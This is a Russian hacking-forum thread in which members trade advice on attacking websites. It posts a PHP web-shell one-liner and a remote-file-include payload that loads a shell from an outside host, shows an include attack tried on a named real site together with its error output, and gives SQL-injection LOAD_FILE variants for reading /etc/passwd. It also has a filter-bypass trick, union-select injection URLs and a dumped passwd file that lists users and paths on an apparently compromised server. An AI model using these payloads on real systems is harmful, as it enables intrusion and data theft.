Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    это значит, что нужно писать
    <?php @system($_GET['cmd']); ?>
     
  2. GrAmOzEkA

    GrAmOzEkA Elder - Старейшина

    Joined:
    25 Jun 2006
    Messages:
    234
    Likes Received:
    76
    Reputations:
    29
    имхо include удобнее =), да систем почти всегда отключен.

    <?php include($_GET['cmd']); ?>

    www.site.com/index.php?cmd=http://shell.ru/shell.txt
     
  3. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    @system сработало.вот только что делать дальше не пойму))))
     
  4. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Хых,самое интересное что инклудить пытался так до того,как ты написал(дошло!:Р),но чёт не вышло.зато @system ошибок не вызвало.знач работает)
     
  5. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.kat.kg/index.php?file=http://site.com/shell.php?cmd=ls+-la

    Warning: forma_2(http://site.com/shell.php?cmd=ls -la) [function.forma-2]: failed to open stream: HTTP request failed! <html> in /usr/local/www/data-dist/kat/index_rus.inc on line 397

    Fatal error: forma_2() [function.require]: Failed opening required 'http://site.com/shell.php?cmd=ls -la' (include_path='.') in /usr/local/www/data-dist/kat/index_rus.inc on line 397

    И чойто я хз...Какой-то НТТР запрос чтоль не прокатил?)
     
  6. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    что делать если например я в sql иньекции в поле вывода пишу скажем 123 он выводит а если пишу
    <? phpinfo() ?>(через char())

    он вырезает эти строки а точнее вырезается всё от наяала <?
     
  7. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Хочешь сделать php-инклудинг через SQL-инъекцию? о.О Вероятность такого крайне мала. Он тебе выведет <? phpinfo(); ?>, но не выполнит как пхп-код
     
  8. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    ну я попробовал просто страннно что всё что начинается с <? до ?> обрезается или хз что там происходит и ещё например я ввожу load_file(/etc/passwd) не пишет что запрос не верный но и не выводит файл

    хотя не, грузит файл
     
    #1748 Doom123, 24 Apr 2008
    Last edited: 24 Apr 2008
  9. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    что можно извлеч из файла /etc/passwd ?
     
  10. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    логины пользователей
     
  11. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Должно быть
    Code:
    LOAD_FILE('/etc/passwd')
    или
    LOAD_FILE("/etc/passwd")
    или
    LOAD_FILE(0x2F6574632F706173737764)
    
    Если ни тот, ни другой, ни третий запрос не вывел ничего, значит, нет соответствующих прав.
     
    2 people like this.
  12. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    PHP:
    fidim:x:2002:101::/:/ftponly sphera_pop:x:2002:101::/:/bin/sh root:x:0:0::/: bin:x:1:1:bin:/bindaemon:x:2:2:daemon:/sbinadm:x:3:4:adm:/var/admlp:x:4:7:lp:/var/spool/lpdsync:x:5:0:sync:/sbinshutdown:x:6:0:shutdown:/sbinhalt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mailnews:x:9:13:news:/var/spool/newsuucp:x:10:14:uucp:/var/spool/uucpoperator:x:11:0:operator:/rootgames:x:12:100:games:/usr/gamesgopher:x:13:30:gopher:/usr/lib/gopher-datagdm:x:42:42::/home/gdmxfs:x:43:43:X Font Server:/etc/X11/fsnobody:x:99:99:Nobody:/: ftp:x:2002:101::/ftp/pub/anonymous:/ftponly tom:x:2002:101::/ftp/pub/tom:/ftponly support:x:2002:101::/ftp/pub/support:/ftponly spice:x:2002:101::/ftp/pub/spice:/ftponly jn:x:2002:101::/var/www/vhosts/fireflyweb:/ftponly fump:x:2002:101::/ftp/pub/fump:/ftponly meef:x:2002:101::/ftp/pub/meef:/ftponly jdelgrosso:x:2002:101::/ftp/pub/jdelgrosso:/ftponly spam:x:2002:101::/ftp/pub/spam:/ftponly manic:x:2002:101::/var/www/vhosts/manicmondays/mp3:/ftponly sdstage:x:2002:101::/var/www/vhosts/suddendeath_stage:/ftponly bugbase:x:2002:101::/var/www/html/bugbase:/ftponly sonicbids:x:2002:101::/ftp/pub/sonicbids:/ftponly
     
  13. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    Doom123
    чисто теоретически:
    <<??>? phpinfo() ?> - <??> обрежется, получится <? phpinfo() ?>
     
    #1753 aka PSIH, 24 Apr 2008
    Last edited: 24 Apr 2008
    1 person likes this.
  14. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    aka PSIH ты был прав) но скрипт не выполнился) вывело просто <? phpinfo()?>
     
  15. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    кстате через иньекцию команду update можно выполнить? если да дайте плиз пример
    например урла с дыркой

    www.site.ru/script.php?id=-1+union+select+1,2/*
     
  16. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    Задавал не таку давно вопрос, но не получил ни одного ответа. Попытаю удачу еще раз ;)
    сканер показал что найдена папка cgi-bin и cgi-bin/formmail.pl, пробовал в браузере зайти на них пишет что таких страниц не существует, как понимать?


    можно если на то права есть, в разделе sql inj я токо что выложил сайт с норм. правами попробуй его.
     
    #1756 bag, 24 Apr 2008
    Last edited: 24 Apr 2008
  17. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    bag Прв хватает это root просто хочу знать как сформировать запрос
     
  18. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    В Мускуле кроме селекта нельзя ничего выполнить.
     
  19. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    Doom123 ну например update table1 set pole1=12345;
    если я прально тя понял...

    вобщем синтаксис такой
    UPDATE [LOW_PRIORITY] [IGNORE] tbl_name
    SET col_name1=expr1 [, col_name2=expr2 ...]
    [WHERE where_definition]
    [ORDER BY ...]
    [LIMIT rows]
     
  20. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    та я знаю sql я спрашиваю как это сделать через иньекцию

    я ж не буду писать

    www.site.ru/s?a=-1+update+table+set+col=1,2+where+id+like+1/*
     
    #1760 Doom123, 24 Apr 2008
    Last edited: 24 Apr 2008
Thread Status:
Not open for further replies.